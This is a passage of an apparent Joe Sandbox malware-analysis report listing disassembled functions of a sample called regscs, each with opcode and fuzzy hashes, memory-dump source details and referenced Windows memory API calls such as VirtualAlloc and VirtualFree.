                                                              • API String ID: 2714655100-0
                                                              • Opcode ID: 516714dde3ec5604a5e33bc2de77af9843e2196fd233ae5c141b8a1ff67af194
                                                              • Instruction ID: 893a1a5f2dac612670decfcbd4773c20bee61da4c8c99e7fbde246bc3725cea9
                                                              • Opcode Fuzzy Hash: 516714dde3ec5604a5e33bc2de77af9843e2196fd233ae5c141b8a1ff67af194
                                                              • Instruction Fuzzy Hash: 48B001F1204511FFB6005A688C88E7FB72DEA552613211551BC46DA006C779AC119AB6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9057338b1f3d92b48a017a035dde2cb39e80d5d75572f7445390586e20107ac4
                                                              • Instruction ID: fb78749a39b6e15c20d5ca8158357fb03e02e9fc55d82070c532b5e360ef37a8
                                                              • Opcode Fuzzy Hash: 9057338b1f3d92b48a017a035dde2cb39e80d5d75572f7445390586e20107ac4
                                                              • Instruction Fuzzy Hash: 89118271248300EAE3148A548C85FFB77A8EB41700F10081BEB969A181E7B8ED27D77B
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,00001000,00003000,00000040), ref: 004BB93B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: a3d256574fad5cfbc3e12ea0a3be4619735a0dae0c9fc2b243e4e1203bb41d91
                                                              • Instruction ID: c3756b0cd52eea0031d26c47708a096afe203b4d0bf5f4ba558a8b7c9c61d0d4
                                                              • Opcode Fuzzy Hash: a3d256574fad5cfbc3e12ea0a3be4619735a0dae0c9fc2b243e4e1203bb41d91
                                                              • Instruction Fuzzy Hash: 4BF0A770909380EFD3126BB54855BA5BFF4AF06300F28489FF6D69B182CA3C5881C77A
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,00001000,00003000,00000040), ref: 004BB93B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 2646a2a870a6af9ea23edbd5fbd60bbe2d7e8f1a51faa9178376c778b403cfb6
                                                              • Instruction ID: 80a7358e0c994c06fe47979a250dc5c6e60ba60ab2b1090ba816801889e84445
                                                              • Opcode Fuzzy Hash: 2646a2a870a6af9ea23edbd5fbd60bbe2d7e8f1a51faa9178376c778b403cfb6
                                                              • Instruction Fuzzy Hash: 10F09B70A04700FFE7146BB5484DBF675D4EF05300F24042FB29AAA280D97C5841577F
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000004), ref: 004BBEF6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: b8b43a38420daa4528b260e0056f6df114d703bddd29722ac9325cd76148c726
                                                              • Instruction ID: 9e3eae2a703b221275a9b3f04b3ada8d186bb767810a9d7459ea4d891241aa97
                                                              • Opcode Fuzzy Hash: b8b43a38420daa4528b260e0056f6df114d703bddd29722ac9325cd76148c726
                                                              • Instruction Fuzzy Hash: EAE0BFB1644740EBE7648A608C4DFAB7BB8EB85B01F10481DF646C9180D7B4E800C776
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004BD2FB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 4808ccc2fa0b8186c81a7278e4358c84581085f7dea7c5d03cdb0448686cb6d9
                                                              • Instruction ID: 5413f2df79023588b9f40ac4a30eccf8274bfe5bc361057254403f5e80e0dfa2
                                                              • Opcode Fuzzy Hash: 4808ccc2fa0b8186c81a7278e4358c84581085f7dea7c5d03cdb0448686cb6d9
                                                              • Instruction Fuzzy Hash: 30D02335244304BBDB1515964C1DFA63718DBC4F21F14C03BF70D596D16DB5D013463A
                                                              APIs
                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 004BA138
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: FreeVirtual
                                                              • String ID:
                                                              • API String ID: 1263568516-0
                                                              • Opcode ID: 2f71b2e6813f83c56b15bedbcc333969a60cc3260a643cc000c2e1ad8c03d3d5
                                                              • Instruction ID: 8315ed5a31abc2ce43fb200fde40a3d839ae49e597cf1d35c04fae0346b4995a
                                                              • Opcode Fuzzy Hash: 2f71b2e6813f83c56b15bedbcc333969a60cc3260a643cc000c2e1ad8c03d3d5
                                                              • Instruction Fuzzy Hash: 26E04631A08741DFC701CF14C881B5A7BF1EF81300F21489AE0919A055C330E84ACB8B
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004BD2FB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 87460f2ea6c543706a71759fc726f9c5a46965a8edca092798f35783bae74650
                                                              • Instruction ID: 868c68b5d660801c8347678b116364fe853f927f56689ec4c9a3cdf058c8008d
                                                              • Opcode Fuzzy Hash: 87460f2ea6c543706a71759fc726f9c5a46965a8edca092798f35783bae74650
                                                              • Instruction Fuzzy Hash: CDD05E32340200AEDB254A69C886FAD3732AFC0B11F658169E6056B2849BB0A441CF55
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,00001000,00003000,00000040), ref: 004BB93B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 0321077620923ce31b5bd3516e5902d735819e08a4763451a019c955c08d816d
                                                              • Instruction ID: 28ec3c71c2d6f88b9d577a568a1040a37d3805c523d208244956de42b0fd6ee3
                                                              • Opcode Fuzzy Hash: 0321077620923ce31b5bd3516e5902d735819e08a4763451a019c955c08d816d
                                                              • Instruction Fuzzy Hash: 75E0EC70D04700DBC750ABB684886A9B6E5AF41300F14086FE19AA7201DA3854419B7A
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000004), ref: 004BBEF6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 29b4004a361227823c46964ec4b280060ed4e2a3f91c962480c9ad063a497885
                                                              • Instruction ID: 9ff541b94316dcdfd13249bfd9ff06e8a94d28552111dd45c47d7a72c169551b
                                                              • Opcode Fuzzy Hash: 29b4004a361227823c46964ec4b280060ed4e2a3f91c962480c9ad063a497885
                                                              • Instruction Fuzzy Hash: A4C08CB5104700DFF3440E208C16BB23BB4FF00B0AF080209FD4AD9281EAB08E159A66
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 02917724f80f9b33fd6be65a6e71095c523e4f9440932657e1117069af48e971
                                                              • Instruction ID: fb87f6b946bb0cea586f9bc01705e75a8c588470e9bdcdf052e039cfcb6c8d91
                                                              • Opcode Fuzzy Hash: 02917724f80f9b33fd6be65a6e71095c523e4f9440932657e1117069af48e971
                                                              • Instruction Fuzzy Hash: C1D0123260C110CBC7204F28D4843ADB7E1FB95300F21456BC547D3104D37C78469B6B
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: ca9141850d09aa91cef8325a9e082fc8326ff54fd596741c848b9a7b722af795
                                                              • Instruction ID: 16aa95483dec47f1b387c175dbf37dd5740b62b766d969040abac79289db6d28
                                                              • Opcode Fuzzy Hash: ca9141850d09aa91cef8325a9e082fc8326ff54fd596741c848b9a7b722af795
                                                              • Instruction Fuzzy Hash: CBC08C36B0962187C2214D3884402DA6294AB04310B000427E802E2200DA14DC0186E5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 98ff7085596f30aa202ab122dcf38ba26ca121219cd86eb4f7d87f8228e7cd6a
                                                              • Instruction ID: 991e40e51db31b90f6e9ccb3a674f4cc7950094324d82eecfab3266ca0a0fd95
                                                              • Opcode Fuzzy Hash: 98ff7085596f30aa202ab122dcf38ba26ca121219cd86eb4f7d87f8228e7cd6a
                                                              • Instruction Fuzzy Hash: AAC09BB1404105EECB494B50CC44BF9757CFF08348F200153F057A5014C7BC14516777
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,00000100,00003000), ref: 004BB145
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 5943e2d9133153ef9b4d9841af50974a8051d56dfa09640ce60615a0f746913e
                                                              • Instruction ID: 104070c8a60a08d9292fbc57d2c7c1d2e7cf6a32bafc3a50a6af59c37a86aded
                                                              • Opcode Fuzzy Hash: 5943e2d9133153ef9b4d9841af50974a8051d56dfa09640ce60615a0f746913e
                                                              • Instruction Fuzzy Hash: C0A002303C930164F09652904C63FA404590704F15E30100573453D0C008D8A142902E